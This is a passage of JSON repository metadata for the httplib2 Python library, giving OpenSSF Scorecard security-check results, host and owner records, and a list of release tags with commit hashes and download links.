https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_ur